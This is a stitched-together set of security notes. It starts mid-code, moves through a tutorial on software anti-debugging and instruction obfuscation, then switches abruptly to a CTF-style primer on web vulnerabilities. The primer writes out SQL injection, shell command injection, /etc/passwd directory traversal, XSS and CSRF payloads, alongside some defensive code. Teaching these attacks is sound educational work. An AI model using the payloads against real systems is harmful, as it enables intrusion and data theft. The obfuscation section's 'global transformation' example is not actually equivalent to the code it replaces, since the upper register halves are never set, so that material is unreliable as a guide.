        return 1;  
    }  
    return 0;  
}

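Exclusive Occupation

Exclusive occupation means the protected program claims for itself a facility that allows only one user at a time. For example, a process can normally be debugged by only one debugger at a time, so the program can be designed to start itself under its own debugging session and use the system's debugging mechanism to keep other debuggers from attaching.

Instruction Obfuscation

Why Instruction Obfuscation Is Needed

The security of software depends heavily on how hard the code is for an analyst to understand once it has been made complex. Instruction obfuscation converts the original instructions into equivalent but extremely complicated ones, raising the cost of analysis and cracking as much as possible.

Common Obfuscation Methods

Code Transformation

Code transformation converts one or more instructions into one or more other, equivalent instructions. Transforming a single instruction is called local transformation; transforming several instructions considered together is called global transformation.

For example, take an assignment instruction like this: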

mov eax, 12345678h

It can be replaced with the following combination of instructions:

push 12345678h
pop eax

Going one step further:

pushfd
mov eax, 1234h
shl eax, 10h
mov ax, 5678h
popfd

pushfd and popfd protect the EFLAGS register from being affected by the transformed instructions.
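A quick way to convince yourself that the transformed sequence is equivalent is to emulate it on 32-bit integers. The Python sketch below does that, reading the constants as hexadecimal (1234h, a shift by 10h = 16 bits, and 5678h); the function name `mov_shl_mov` is made up for illustration.

```python
MASK32 = 0xFFFFFFFF


def mov_shl_mov(high, low):
    """Emulate: mov eax, high; shl eax, 16; mov ax, low."""
    eax = high & MASK32                          # mov eax, 1234h
    eax = (eax << 16) & MASK32                   # shl eax, 10h
    eax = (eax & 0xFFFF0000) | (low & 0xFFFF)    # mov ax, 5678h
    return eax


result = mov_shl_mov(0x1234, 0x5678)
print(hex(result))
```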

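Continuing the substitution:

pushfd
push 1234h
pop eax
shl eax, 10h
mov ax, 5678h
popfd

As a result, even a simple instruction can turn into hundreds or thousands of instructions, which makes the code much harder to understand.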

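Consider another example:

jmp {label}

can become:

push {label}
ret

Moreover, IDA cannot recognize this kind of transfer to label as a jump.

The instruction:

call {label}

can be replaced with:

push {label of the instruction after the call}
push {label}
ret

The instruction:

push {op}

can be replaced with:

sub esp, 4
mov [esp], {op}

Now let's look at global transformation. Take the following code: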

mov eax, ebx
mov ecx, eax

Because the two instructions are related, they must be considered together when transforming them, for example like this:

mov cx, bx
mov ax, cx
mov ch, bh
mov ah, bh

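This interdependence makes it harder to derive the original code from the transformed code.

Junk Instructions

Junk instructions are instructions inserted into the original code that can be executed but have no effect. They exist only to disrupt analysis, not just by human analysts but also by disassemblers and debuggers.

Here is an example. The original instructions are: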

add eax, ebx
mul ecx

After adding junk instructions:

xor esi, 011223344h
add esi, eax
add eax, ebx
mov edx, eax
shl edx, 4
mul ecx
xor esi, ecx

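The added instructions use the esi and edx registers, which the original program does not rely on (edx is overwritten by mul ecx in any case). They are pure junk.

Some junk bytes are meant to confuse the disassembler, for example:

01003689    50          push eax
0100368A    53          push ebx

After adding junk bytes: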

01003689    50          push eax
0100368A    EB 01       jmp short 0100368D
0100368C    FF53 6A     call dword ptr [ebx+6A]

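This looks odd at first, but it is simply because the bytes EB 01 FF were inserted, which misleads a linear-sweep disassembler. At run time the second instruction jumps to the correct location, so the actual flow is:

01003689    50          push eax
0100368A    EB 01       jmp short 0100368D
0100368C    FF          db 0FFh            ; junk byte, skipped by the jmp
0100368D    53          push ebx

Scrambling the Instruction Sequence

Instructions normally execute in a fixed sequence, for example: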

01003689    push eax
0100368A    push ebx
0100368B    xor eax, eax
0100368D    cmp eax, 0
01003690    jne short 01003695
01003692    inc eax
01003693    jmp short 0100368D
01003695    pop ebx
01003696    pop eax

This sequence is easy to follow, so scrambling the instruction sequence means rearranging the instructions to confuse the analyst:

01003689    push eax
0100368A    jmp short 01003694
0100368C    xor eax, eax
0100368E    jmp short 01003697
01003690    jne short 0100369F
01003692    jmp short 0100369C
01003694    push ebx
01003695    jmp short 0100368C
01003697    cmp eax, 0
0100369A    jmp short 01003690
0100369C    inc eax
0100369D    jmp short 01003697
0100369F    pop ebx
010036A0    pop eax

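It looks messy, but the actual execution order is unchanged.

Multiple Branches

Multiple branching uses different conditional jump instructions to complicate the program's execution flow. Unlike scrambling the instruction sequence, it does change the program's execution flow. For example: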

01003689    push eax
0100368A    push ebx
0100368B    push ecx
0100368C    push edx

After transformation:

01003689    push eax
0100368A    je short 0100368F
0100368C    push ebx
0100368D    jmp short 01003690
0100368F    push ebx
01003690    push ecx
01003691    push edx

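A conditional branch has been added, but we do not care whether it is taken. The program now has an element of uncertainty: which path runs is known only at execution time. What is certain is that this code produces the same result as the original.

To improve on this, replace the code in one branch with different code: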

01003689    push eax
0100368A    je short 0100368F
0100368C    push ebx
0100368D    jmp short 01003693
0100368F    push eax
01003690    mov dword ptr [esp], ebx
01003693    push ecx
01003694    push edx

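Opaque Predicates

An opaque predicate is an expression whose value at a given point in the program is known to the programmer, but which a compiler or static analyzer cannot deduce and which can only be determined at run time. The multiple-branch technique above also relies on opaque predicates.

In the following code: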

mov esi, 1
... ; some code not touching esi
dec esi
...
cmp esi, 0
jz real_code
; fake luggage
real_code:

Suppose we know that esi is certainly 0 here. We can then insert instructions of arbitrary length and complexity at fake luggage to obfuscate the code.
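A classic arithmetic opaque predicate, offered here as an illustrative sketch rather than something taken from the text above, is that x * (x + 1) is always even. The Python version below guards the real code with it; the function names and the junk expression are invented for the example.

```python
import random


def opaquely_true(x):
    """The product of two consecutive integers is always even."""
    return (x * (x + 1)) % 2 == 0


def protected_add(a, b):
    x = random.randint(-10**6, 10**6)   # value unknown to a static reader
    if opaquely_true(x):
        return a + b                     # real code
    return a * b - 12345                 # junk path, never executed


print(protected_add(2, 3))
```

A static analyzer that cannot prove the predicate has to treat both paths as reachable, which is exactly the effect the fake luggage block aims for.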

Another example (again assuming esi is 0):

add eax, ebx
mul ecx
add eax, esi

Indirect Pointers

dummy_data1 db      100h dup (0)
message1    db      'hello world', 0

dummy_data2 db      200h dup (0)
message2    db      'another message', 0

func        proc
            ...
            mov     eax, offset dummy_data1
            add     eax, 100h
            push    eax
            call    dump_string
            ...
            mov     eax, offset dummy_data2
            add     eax, 200h
            push    eax
            call    dump_string
            ...
func        endp

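Here message is referenced indirectly through dummy_data, so IDA cannot correctly identify the reference to message.

Code Virtualization

Virtual-machine-based code protection can also be considered a form of code obfuscation, and it currently gives the strongest protection of all obfuscation methods. Put simply, it uses a body of emulation code to emulate the execution of the protected code and computes the same result the protected code would have produced.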

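+---------------------+
| Head instructions   | -------> | VM entry |
|---------------------|                |
|                     |          | Save the code context |
|                     |                |
| Middle instructions |          | Emulate the middle instructions |
|                     |                |
|                     |          | Set up the new code context |
|---------------------|                |
| Tail instructions   | <------- | VM exit |
+---------------------+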

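When execution reaches the start of the protected instruction sequence, it transfers to the VM entry. At that point the current thread's context must be saved, and then the emulation phase begins; this phase is the core of the code VM. There are two ways to keep the VM's stack usage from conflicting with that of the original code. One is to allocate new space on the heap, and the other is to keep using the stack space of the original code. Each has its trade-offs, and in practice the second is more common.

There are likewise two ways to emulate the original code. One converts the original instruction sequence into data with a direct or indirect correspondence that only the VM understands, for example 0 for push, 1 for mov, and so on. Such directly or indirectly equivalent data is called an opcode. The other translates the meaning of the original code directly into new code, similar to code transformation. Because it works at the level of instruction semantics, it is very hard to design.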
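To make the opcode approach concrete, here is a deliberately tiny stack-based VM in Python. Everything about it is an assumption made for illustration: the opcode numbering (PUSH, ADD, MUL, HALT) is invented and does not correspond to any real protector. The program emulates the add and mul pair used in the junk instruction example, computing (2 + 3) * 4.

```python
# Hypothetical opcode numbering, known only to this VM.
PUSH, ADD, MUL, HALT = 0, 1, 2, 3
MASK32 = 0xFFFFFFFF


def run(bytecode):
    """Interpret the bytecode and return the value on top of the stack."""
    stack, pc = [], 0
    while True:
        op = bytecode[pc]
        pc += 1
        if op == PUSH:                    # PUSH imm
            stack.append(bytecode[pc])
            pc += 1
        elif op == ADD:
            b, a = stack.pop(), stack.pop()
            stack.append((a + b) & MASK32)
        elif op == MUL:
            b, a = stack.pop(), stack.pop()
            stack.append((a * b) & MASK32)
        elif op == HALT:                  # VM exit
            return stack.pop()
        else:
            raise ValueError("unknown opcode {}".format(op))


program = [PUSH, 2, PUSH, 3, ADD, PUSH, 4, MUL, HALT]
result = run(program)
print(result)
```

An analyst who sees only the bytecode list has to reverse the interpreter first, which is where the protection comes from.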

Web Exploitation

https://ctf101.org/web-exploitation/overview/

Websites all around the world are programmed using various programming languages. While the developer should be aware of specific vulnerabilities in each programming language, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.

These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher-level privilege.

Common vulnerabilities to see in CTF challenges:

SQL Injection
Command Injection
Directory Traversal
Cross-Site Request Forgery
Cross-Site Scripting
Server-Side Request Forgery

SQL Injection

SQL Injection is a vulnerability where an application takes input from a user and doesn't validate that the user's input doesn't contain additional SQL.

<?php
    $username = $_GET['username']; // kchung
    $result = mysql_query("SELECT * FROM users WHERE username='$username'");
?>

If we look at the $username variable, we might expect the username parameter to be a real username (e.g. kchung) under normal operation.

But a malicious user might submit a different kind of data. For example, consider if the input was '?

The application would crash because the resulting SQL query is incorrect.

SELECT * FROM users WHERE username='''

Notice the extra single quote at the end.

With the knowledge that a single quote will cause an error in the application, we can expand a little more on SQL Injection.

What if our input was ' OR 1=1?

SELECT * FROM users WHERE username='' OR 1=1

1 is indeed equal to 1. This equates to true in SQL. If we reinterpret this the SQL statement is really saying

SELECT * FROM users WHERE username='' OR true

This will return every row in the table because the WHERE condition now evaluates to true for every row.

We can also inject comments and termination characters like -- or /* or ;. This allows you to terminate SQL queries after your injected statements. For example '-- is a common SQL injection payload.

SELECT * FROM users WHERE username=''-- '

This payload sets the username parameter to an empty string to break out of the query and then adds a comment (--) that effectively hides the second single quote.

Using this technique of adding SQL statements to an existing query, we can force a database to return data that it was not meant to return.
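The effect is easy to reproduce safely with an in-memory SQLite database. The sketch below is an illustration, not the PHP application above: the table contents and function names are invented, and it contrasts string concatenation with a parameterized query using Python's standard sqlite3 module.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("kchung", "a"), ("admin", "b")])


def lookup_vulnerable(username):
    # User input is pasted straight into the SQL text.
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(username):
    # The driver passes the value separately from the SQL text.
    return conn.execute("SELECT * FROM users WHERE username=?",
                        (username,)).fetchall()


payload = "' OR 1=1 -- "
print(len(lookup_vulnerable(payload)), len(lookup_safe(payload)))
```

With the parameterized query the payload is treated as a literal username, so no rows match.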

Command Injection

Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system() command or its equivalent in the application's programming language.

import os

domain = user_input() # ctf101.org

os.system('ping ' + domain)

The above code when used normally will ping the ctf101.org domain.

But consider what would happen if the user_input() function returned different data.

import os

domain = user_input() # ; ls

os.system('ping ' + domain)

Because of the additional semicolon, the os.system() function is instructed to run two commands.

It looks to the program as:

ping ; ls

The semicolon terminates a command in bash and allows you to put another command after it.

Because the ping command is being terminated and the ls command is being added on, the ls command will be run in addition to the empty ping command!

This is the core concept behind command injection. The ls command could of course be switched with another command (e.g. wget, curl, bash, etc.)

Command injection is a very common means of privilege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.
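One way to see the difference between vulnerable and safer command construction, without running anything, is to build the command strings and inspect them. The sketch below uses Python's standard shlex module; the function names are hypothetical, and passing an argument list to subprocess.run (no shell at all) is generally the more robust option.

```python
import shlex


def build_vulnerable(domain):
    # The shell will interpret any metacharacters in domain.
    return "ping " + domain


def build_quoted(domain):
    # shlex.quote makes the input a single shell word.
    return "ping " + shlex.quote(domain)


def build_argv(domain):
    # Argument list for subprocess.run(argv); no shell is involved.
    return ["ping", domain]


payload = "; ls"
print(build_vulnerable(payload))
print(build_quoted(payload))
print(build_argv(payload))
```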

Example Payloads

;ls
$(ls)
`ls`

Directory Traversal

Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.

Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.

For example, consider an application that allows the user to choose what page to load from a GET parameter.

<?php
    $page = $_GET['page']; // index.php
    include("/var/www/html/" . $page);
?>

Under normal operation, the page would be index.php. But what if a malicious user supplied something different?

<?php
    $page = $_GET['page']; // ../../../../../../../../etc/passwd
    include("/var/www/html/" . $page);
?>

Here the user is submitting ../../../../../../../../etc/passwd.

This causes the PHP interpreter to leave the directory that it is coded to look in ('/var/www/html') and climb up to the root folder.

include("/var/www/html/../../../../../../../../etc/passwd");

Ultimately this will become /etc/passwd, because the parent of the root directory is the root directory itself, so the extra ../ components have no further effect.

Thus the application will load the /etc/passwd file and emit it to the user like so:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false

This same concept can be applied to any application where input is taken from a user and then used to access a file or path. This vulnerability can very often be used to leak sensitive data or to extract application source code in order to find other vulnerabilities.
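The path arithmetic in the example above can be checked with a short sketch. It uses Python's posixpath module so that it behaves the same on any platform. BASE_DIR mirrors the directory from the PHP example, while resolve and is_inside_base are hypothetical helper names. Note that normpath only normalizes the text of a path and does not follow symbolic links, so this is an illustration rather than a complete defense.

```python
import posixpath

BASE_DIR = "/var/www/html"

def resolve(page: str) -> str:
    # Join the user-supplied page onto the base and collapse any ../ parts.
    return posixpath.normpath(posixpath.join(BASE_DIR, page))

def is_inside_base(page: str) -> bool:
    # Accept the path only if it still lives under BASE_DIR after resolving.
    resolved = resolve(page)
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/")

benign = "index.php"
malicious = "../../../../../../../../etc/passwd"

print(resolve(benign), is_inside_base(benign))
print(resolve(malicious), is_inside_base(malicious))
```

Checking the resolved path against the intended base directory before opening the file is one way to reject traversal attempts.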

Cross-Site Request Forgery (CSRF)

A Cross-Site Request Forgery, or CSRF (pronounced "sea surf"), is an attack on an authenticated user that abuses their existing session to perform state-changing actions such as a purchase, a transfer of funds, or a change of email address.

The premise of CSRF is to ride the victim's existing session rather than steal it. The attacker usually injects malicious elements into a webpage, such as an <img> tag or an <iframe>, whose references to external resources are not verified, and the victim's browser sends the resulting request with the session cookie attached.

Using CSRF

GET requests are often used by websites to get user input. Say a user signs in to a banking site that assigns their browser a cookie that keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:

http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]

Knowing this format, an attacker can send an email with a hyperlink for the victim to click, or include a 0-by-0-pixel image tag that the browser will request automatically, such as:

<img src="http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]" width="0" height="0" border="0">
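Why the forged request succeeds can be sketched with a tiny in-memory model of the server. Everything here is hypothetical: SESSIONS, login, transfer_cookie_only, and transfer_with_token are illustrative names, and the per-session token check is a commonly used mitigation that the text above does not describe.

```python
import hmac
import secrets

# Hypothetical session store: session cookie -> per-session CSRF token.
SESSIONS = {}

def login() -> str:
    # Issue a session cookie and remember a secret token for that session.
    cookie = secrets.token_hex(16)
    SESSIONS[cookie] = secrets.token_hex(16)
    return cookie

def transfer_cookie_only(cookie: str) -> bool:
    # Vulnerable: the browser attaches the cookie to every request,
    # including one triggered by a hidden image on another site.
    return cookie in SESSIONS

def transfer_with_token(cookie: str, submitted_token: str) -> bool:
    # Mitigated: the request must also carry a token the attacker cannot read.
    expected = SESSIONS.get(cookie)
    return expected is not None and hmac.compare_digest(expected, submitted_token)

victim_cookie = login()
forged_ok = transfer_cookie_only(victim_cookie)          # forged request accepted
forged_blocked = transfer_with_token(victim_cookie, "")  # forged request rejected
genuine_ok = transfer_with_token(victim_cookie, SESSIONS[victim_cookie])

print(forged_ok, forged_blocked, genuine_ok)
```

The forged request carries the cookie but not the token, because the attacker's page can make the browser send a request but cannot read values from the bank's own pages.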

Cross-Site Scripting (XSS)

Cross-Site Scripting or XSS is a vulnerability where one user of an application can send JavaScript that is executed by the browser of another user of the same application.

This is a vulnerability because JavaScript has a high degree of control over a user's web browser.

For example, JavaScript has the ability to:

Modify the page (called the DOM)
Send more HTTP requests
Access cookies

By combining all of these abilities, XSS can maliciously use JavaScript to extract users' cookies and send them to an attacker-controlled server. XSS can also modify the DOM to phish users for their passwords. This only scratches the surface of what XSS can be used to do.

XSS is typically broken down into three categories:

Reflected XSS
Stored XSS
DOM XSS

Reflected XSS

Reflected XSS is when an XSS exploit is provided through a URL parameter.

For example:

https://ctf101.org?data=<script>alert(1)</script>

You can see the XSS exploit provided in the data GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.

For example:

<html>
    <body>
        <script>alert(1)</script>
    </body>
</html>

Depending on where the exploit gets injected, it may need to be constructed differently.

Also, the exploit payload can change to fit whatever the attacker needs it to do, whether that is to extract cookies and submit them to an external server, or simply to modify the page to deface it.

One deficiency of reflected XSS, however, is that it requires the victim to access the vulnerable page through an attacker-controlled resource, such as a crafted link. Notice that if the data parameter wasn't provided, the exploit wouldn't work.

In some situations, reflected XSS can be detected by the browser, because the payload is visible in the URL. However, built-in filters of this kind have been removed from modern browsers such as Chrome, so they should not be relied on.
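The reflected XSS example above can be sketched on the server side in a few lines. The render_vulnerable and render_escaped functions are hypothetical stand-ins for a page template, and html.escape from Python's standard library is used as one possible way to encode the value before it reaches the page.

```python
import html

def render_vulnerable(data: str) -> str:
    # Vulnerable: the parameter value is placed into the page unchanged.
    return "<html><body>" + data + "</body></html>"

def render_escaped(data: str) -> str:
    # Escaped: <, >, & and quotes become HTML entities, so the browser
    # displays the payload as text instead of running it.
    return "<html><body>" + html.escape(data) + "</body></html>"

payload = "<script>alert(1)</script>"  # value of the data GET parameter

vulnerable_page = render_vulnerable(payload)
escaped_page = render_escaped(payload)

print(vulnerable_page)
print(escaped_page)
```

Escaping for the HTML body is only suitable when the value lands between tags. A value injected into an attribute, a URL, or a script block needs encoding appropriate to that context.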

Stored XSS

Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.

Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.

The reason is that the website itself is serving up the XSS payload to other users. This makes it very difficult to detect from the browser's perspective and no browser is capable of generically preventing stored XSS from exploiting a user.

DOM XSS

DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client-side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.

The server itself is not to blame, but the client-side JavaScript files are causing the issue.

Server Side Request Forgery (SSRF)

Server Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.

For example, say there is a website that lets you take a screenshot of any site on the internet.

Under normal usage, a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost, or tried to access something more useful like http://localhost/server-status?

127.0.0.1 (also known as localhost or the loopback address) represents the computer itself. Accessing localhost means you are accessing services running on that same computer rather than on another machine. Developers often use localhost as a way to access the services they have running on their own computers.

Depending on the response from the site, the attacker may be able to gain additional information about what's running on the computer itself.

In addition, the requests originating from the server would come from the server's IP, not the attacker's IP. Because of that, the attacker might be able to access internal resources that they wouldn't normally be able to reach.

Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.
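A screenshot service like the one described above could inspect the requested URL before fetching it. The sketch below is a minimal illustration under stated assumptions: looks_internal is a hypothetical helper, it performs no DNS lookups, and it does not handle redirects or hostnames that resolve to internal addresses, so it should not be read as a complete defense.

```python
import ipaddress
from urllib.parse import urlparse

def looks_internal(url: str) -> bool:
    # Extract the host part of the URL (lowercased, without the port).
    host = urlparse(url).hostname
    if host is None:
        return True  # No host could be parsed: treat the URL as unsafe.
    if host == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name. Real code would resolve it and check every address.
        return False
    # Loopback (127.0.0.0/8, ::1), private ranges, and link-local addresses.
    return addr.is_loopback or addr.is_private or addr.is_link_local

for candidate in ("https://www.nytimes.com/",
                  "http://localhost/server-status",
                  "http://127.0.0.1/",
                  "http://10.0.0.5:8080/admin"):
    print(candidate, looks_internal(candidate))
```

The same kind of request, repeated across many internal addresses and ports, is what turns an SSRF flaw into the simple port scanner mentioned above.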
